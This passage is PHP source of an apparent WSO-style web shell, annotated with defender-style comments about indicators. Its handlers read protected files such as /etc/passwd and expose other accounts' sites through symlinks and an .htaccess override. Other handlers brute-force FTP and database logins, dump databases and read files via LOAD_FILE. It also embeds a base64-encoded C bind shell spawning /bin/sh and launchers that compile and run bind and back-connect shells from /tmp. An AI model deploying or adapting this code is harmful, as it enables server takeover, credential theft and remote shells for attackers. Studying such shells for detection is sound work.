    echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
    // Captured output is emitted unescaped.
    if($temp)
        echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
    echo '</div>';
    printFooter();
}
1008// Safe mode end ---------------------
1009// Logout go -------------------------
// Handler for the "Logout" action: drops the per-host login flag from the session.
// The key md5($_SERVER['HTTP_HOST']) is the shell's authentication marker; its
// presence in a serialized PHP session file is an on-disk indicator of an
// authenticated operator session.
function actionLogout() {
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
    echo 'bye!';
}
1014// Logout end -------------------------
1015// Suicide go -------------------------
// Handler for the "SelfRemove" action: deletes the shell's own file (SELF_PATH)
// after a p1=yes confirmation. An unlink of the script by the web-server user,
// with a session file left behind, is the trace this leaves.
function actionSelfRemove() {
    printHeader();
    if($_POST['p1'] == 'yes') {
        if(@unlink(SELF_PATH))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    }
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    printFooter();
}
1027// Suicide end -------------------------
// Handler for the "Tools" action: an empty placeholder that only renders the
// shell's header and footer.
function actionTools() {
    printHeader();

    printFooter();
}
1033// Domains go -------------------------
// Handler for the "Domains" action: enumerates BIND zones from /etc/named.conf,
// maps each to the owner of /etc/valiases/<domain>, and sets up a symlink-based
// browse path for other accounts' public_html.
// On-disk artifacts: a "sym" directory containing a ".htaccess" with AddType /
// AddHandler / Options directives, and a symlink "0/x.txt" -> "/" (note the
// symlink is created under "0/", while the .htaccess and the generated links
// refer to "sym/"). eregi() was removed in PHP 7, so this handler fatals there.
function actionDomains() {
    printHeader();
    error_reporting(0);
    echo "<title>#Domains & Users</title>";
    mkdir("sym");
    symlink("/","0/x.txt");
    // .htaccess content: makes .php/.html serve as plain text and relaxes access.
    $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
    $f = fopen ('sym/.htaccess','w');
    fwrite($f , $c);

    $d0mains = @file("/etc/named.conf");
    if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]"); }
    echo "<table align=center border=1>
 <tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
    foreach($d0mains as $d0main){
        if(eregi("zone",$d0main)){
            preg_match_all('#zone "(.*)"#', $d0main, $domains);
            flush();
            if(strlen(trim($domains[1][0])) > 2){
                // Owner of the cPanel-style valiases file is taken as the account user.
                $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
                echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>"; flush();
            }}}
    echo "</table>
 <p align='center'>
 FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a
 href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br>
 </p>
 ";
    printFooter();
}
1064// Domains end -----------------------
1065// Infect go -------------------------
// Handler for the "Infect" action. Despite the name, the visible code only walks
// DOCUMENT_ROOT recursively and prints the writable .php files other than the
// shell itself, followed by a count; nothing is written to those files here.
// The traversal itself (opendir/is_dir/is_writeable over the whole docroot) is
// the observable side effect.
function actionInfect() {
    printHeader();
    echo '<h1>Infect</h1><div class=content>';
    if($_POST['p1'] == 'infect') {
        $target=$_SERVER['DOCUMENT_ROOT'];
        // Recursive listing of all regular entries below $dir (no "." / "..").
        function ListFiles($dir) {
            if($dh = opendir($dir)) {
                $files = Array();
                $inner_files = Array();
                while($file = readdir($dh)) {
                    if($file != "." && $file != "..") {
                        if(is_dir($dir . "/" . $file)) {
                            $inner_files = ListFiles($dir . "/" . $file);
                            if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                        } else {
                            array_push($files, $dir . "/" . $file);
                        }
                    }
                }
                closedir($dh);
                return $files;
            }
        }
        // $i is never initialised; it is incremented from an undefined value and
        // printed as the total below.
        foreach (ListFiles($target) as $key=>$file){
            $nFile = substr($file, -4, 4);
            if($nFile == ".php" ){
                if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
                    echo "$file<br>";
                    $i++;
                }
            }
        }
        echo "<font color=red size=14>$i</font>";
    }else{
        echo "<form method=post><input type=submit value=Infect name=infet></form>";
        echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
    }
    printFooter();
}
1105// Infect end -----------------------
1106// Bruteforce go --------------------
// Handler for the "Bruteforce" action: credential guessing against FTP, MySQL or
// PostgreSQL on $_POST['server'] ("host:port"). Two modes: type=1 reads local
// /etc/passwd and tries login==password (and the reversed login when
// 'reverse' is set); type=2 reads a wordlist from the path in $_POST['dict'].
// From a defender's view this produces a burst of failed logins on the target
// service originating from the web server, and a read of /etc/passwd or the
// dictionary file by the web-server user.
function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        // A per-protocol bruteForce($ip,$port,$login,$pass) is declared conditionally.
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            // mysql_* functions were removed in PHP 7. Operator precedence also
            // means the ternary condition is the whole "$ip:$port" string, so
            // the host argument as written is just $port (or 3306).
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            // $str is built but unused, and $server is not defined in this
            // function's scope, so this variant does not use its $ip/$port.
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            // Mode 1: usernames from the local /etc/passwd.
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        // Second guess: the login spelled backwards.
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            // Mode 2: one fixed login, passwords read line-by-line from $_POST['dict'].
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="root"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}
1190// Bruteforce end --------------------
1191// Sql go ----------------------------
// Handler for the "Sql" action: a MySQL/PostgreSQL browser with table listing,
// paged SELECT, free-form query execution, gzip-compressed SQL dump download and
// a LOAD_FILE() file reader. Credentials arrive in sql_host/sql_login/sql_pass/
// sql_base and are sent with every request.
// Compatibility: the class uses a PHP4-style constructor and the mysql_*
// extension (removed in PHP 8 and PHP 7 respectively), and the page code uses
// each() (removed in PHP 8); on current runtimes the MySQL paths fatal.
// Database-side indicators: "SHOW CREATE TABLE", "SELECT COUNT(*) as n FROM",
// "SELECT LOAD_FILE(...) as file" and the pg_database / information_schema
// queries below issued from the web-server host.
function actionSql() {
    // Thin wrapper over the mysql_* / pg_* procedural APIs selected by $type.
    class DbClass {
        var $type;
        var $link;
        var $res;
        // PHP4-style constructor (same name as the class).
        function DbClass($type) {
            $this->type = $type;
        }
        // Opens the connection; returns true on success, false otherwise.
        // For pgsql, $host is "host[:port]" with 5432 as the default port.
        function connect($host, $user, $pass, $dbname){
            switch($this->type) {
                case 'mysql':
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                    break;
            }
            return false;
        }
        // MySQL only; pgsql selects the database at connect time.
        function selectdb($db) {
            switch($this->type) {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        // Runs $str verbatim and caches the result handle in $this->res.
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        // Fetches the next row as an associative array from the optional result
        // handle argument, defaulting to the last query's result.
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type) {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        function listDbs() {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_list_dbs($this->link);
                    break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database");
                    break;
            }
            return false;
        }
        function listTables() {
            switch($this->type) {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                    break;
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
                    break;
            }
            return false;
        }
        function error() {
            switch($this->type) {
                case 'mysql':
                    return @mysql_error($this->link);
                    break;
                case 'pgsql':
                    return @pg_last_error($this->link);
                    break;
            }
            return false;
        }
        // Sets the client charset. Both case labels read 'mysql', so the
        // pg_set_client_encoding branch is unreachable as written.
        function setCharset($str) {
            switch($this->type) {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'mysql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        // Writes a CREATE TABLE (MySQL only) plus one INSERT per row to output.
        // The table name is interpolated into the SQL without escaping.
        function dump($table) {
            switch($this->type) {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
                    $create = mysql_fetch_array($res);
                    echo $create[1].";\n\n";
                    $this->query('SELECT * FROM `'.$table.'`');
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".@mysql_real_escape_string($v)."'";
                            $columns[] = "`".$k."`";
                        }
                        echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                    break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                        echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                    break;
            }
            return false;
        }
    };
    $db = new DbClass($_POST['type']);
    if(@$_POST['p2']=='download') {
        // Dump path: gzip-compressed "dump.sql" attachment of the tables in tbl[].
        // A text/plain download of that name is a network-side artifact.
        ob_start("ob_gzhandler", 4096);
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        header("Content-Disposition: attachment; filename=dump.sql");
        header("Content-Type: text/plain");
        foreach($_POST['tbl'] as $v)
            $db->dump($v);
        exit;
    }
    printHeader();
 ?>
 <h1>Sql browser</h1><div class=content>
 <form name="sf" method="post">
 <table cellpadding="2" cellspacing="0">
 <tr>
 <td>Type</td>
 <td>Host</td>
 <td>Login</td>
 <td>Password</td>
 <td>Database</td>
 <td></td>
 </tr>
 <tr>
 <input type=hidden name=a value=Sql>
 <input type=hidden name=p1 value='query'>
 <input type=hidden name=p2>
 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
 <td>
 <select name='type'>
 <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
 <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
 </select></td>
 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
 <td>
 <?php
    // Database selector: connects with the posted credentials and lists databases;
    // falls back to a free-text input when no host was posted or connect fails.
    $tmp = "<input type=text name=sql_base value=''>";
    if(isset($_POST['sql_host'])){
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            switch($_POST['charset']) {
                case "Windows-1251": $db->setCharset('cp1251'); break;
                case "UTF-8": $db->setCharset('utf8'); break;
                case "KOI8-R": $db->setCharset('koi8r'); break;
                case "KOI8-U": $db->setCharset('koi8u'); break;
                case "cp866": $db->setCharset('cp866'); break;
            }
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            while($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo '</select>';
        }
        else echo $tmp;
    }else
        echo $tmp;
 ?></td>
 <td><input type=submit value=">>"></td>
 </tr>
 </table>
 <script>
 function st(t,l) {
 document.sf.p1.value = 'select';
 document.sf.p2.value = t;
 if(l!=null)document.sf.p3.value = l;
 document.sf.submit();
 }
 function is() {
 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
 document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
 }
 </script>
 <?php
    if(isset($db) && $db->link){
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
        if(!empty($_POST['sql_base'])){
            $db->selectdb($_POST['sql_base']);
            echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
            // Table list with row counts; one COUNT(*) per table.
            $tbls_res = $db->listTables();
            while($item = $db->fetch($tbls_res)) {
                list($key, $value) = each($item);
                $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                $value = htmlspecialchars($value);
                echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
            }
            echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
            if(@$_POST['p1'] == 'select') {
                // Browse mode: p2 is the table, p3 the page index; rewritten into a
                // LIMIT query in p3 and then handled by the 'query' branch below.
                $_POST['p1'] = 'query';
                $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
                $num = $db->fetch();
                $num = $num['n'];
                echo "<span>".$_POST['p2']."</span> ($num) ";
                for($i=0;$i<($num/30);$i++)
                    if($i != (int)$_POST['p3'])
                        echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
                    else
                        echo ($i+1)," ";
                if($_POST['type']=='pgsql')
                    $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                else
                    $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                echo "<br><br>";
            }
            if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
                // Free-form query: p3 is executed verbatim and rendered as a table.
                $db->query(@$_POST['p3']);
                if($db->res !== false) {
                    $title = false;
                    echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
                    $line = 1;
                    while($item = $db->fetch()) {
                        if(!$title) {
                            echo '<tr>';
                            foreach($item as $key => $value)
                                echo '<th>'.$key.'</th>';
                            reset($item);
                            $title=true;
                            echo '</tr><tr>';
                            $line = 2;
                        }
                        echo '<tr class="l'.$line.'">';
                        $line = $line==1?2:1;
                        foreach($item as $key => $value) {
                            if($value == null)
                                echo '<td><i>null</i></td>';
                            else
                                echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
                        }
                        echo '</tr>';
                    }
                    echo '</table>';
                } else {
                    echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                }
            }
            echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
            echo "</td></tr>";
        }
        echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
        if(@$_POST['p1'] == 'loadfile') {
            // Reads a server-side file through the database (MySQL LOAD_FILE);
            // the FILE privilege and secure_file_priv on the DB side govern this.
            $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
            $file = $db->fetch();
            echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
        }
    }
    echo '</div>';
    printFooter();
}
1474// Sql end -------------------------
1475// Network go --------------------
1476function actionNetwork() {
1477 printHeader();
1478 $back_connect_c="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";
1479 $back_connect_p="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";
1480 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1481 $bind_port_p="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";
1482 echo "<h1>Network tools</h1><div class=content>
1483 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
1484 <span>Bind port to /bin/sh</span><br/>
1485 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
1486 </form>
1487 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
1488 <span>Back-connect to</span><br/>
1489 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
1490 </form><br>";
1491 if(isset($_POST['p1'])) {
1492 function cf($f,$t) {
1493 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1494 if($w) {
1495 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1496 @fclose($w);
1497 }
1498 }
1499 if($_POST['p1'] == 'bpc') {
1500 cf("/tmp/bp.c",$bind_port_c);
1501 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1502 @unlink("/tmp/bp.c");
1503 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1504 echo "<pre class=ml1>$out".ex("ps aux | grep bp")."</pre>";
1505 }
1506 if($_POST['p1'] == 'bpp') {
1507 cf("/tmp/bp.pl",$bind_port_p);
1508 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1509 echo "<pre class=ml1>$out".ex("ps aux | grep bp.pl")."</pre>";
1510 }
1511 if($_POST['p1'] == 'bcc') {
1512 cf("/tmp/bc.c",$back_connect_c);
1513 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1514 @unlink("/tmp/bc.c");
1515 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1516 echo "<pre class=ml1>$out".ex("ps aux | grep bc")."</pre>";
1517 }
1518 if($_POST['p1'] == 'bcp') {
1519 cf("/tmp/bc.pl",$back_connect_p);
1520 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1521 echo "<pre class=ml1>$out".ex("ps aux | grep bc.pl")."</pre>";
1522 }
1523 }
1524 echo '</div>';
1525 printFooter();
1526}
1527// Network end --------------------
1528// Port Scanner go --------------------
1529function actionPortScanner() {
1530 printHeader();
1531 echo '<h1>Port Scanner</h1>';
1532 echo '<div class="content">';
1533 echo '<form action="" method="post">';
1534
1535 if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
1536 $start = strip_tags($_POST['start']);
1537 $end = strip_tags($_POST['end']);
1538 $host = strip_tags($_POST['host']);
1539 for($i = $start; $i<=$end; $i++){
1540 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1541 if($fp){
1542 echo 'Port '.$i.' is <font color=lime>open</font><br>';
1543 }
1544 flush();
1545 }
1546 } else {
1547 echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
1548 <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1549 <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1550 Host: <input type="text" name="host" value="localhost"/><br /><br />
1551 Port start: <input type="text" name="start" value="0"/><br /><br />
1552 Port end:<input type="text" name="end" value="5000"/><br /><br />
1553 <input type="submit" value="Scan Ports" />
1554 </form></center><br /><br />';
1555 }
1556 echo '</div>';
1557 printFooter();
1558}
1559// Port Scanner end --------------------
1560if( empty($_POST['a']) )
1561 if(isset($default_action) && function_exists('action' . $default_action))
1562 $_POST['a'] = $default_action;
1563 else
1564 $_POST['a'] = 'FilesMan';
1565if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1566 call_user_func('action' . $_POST['a']);
1567?>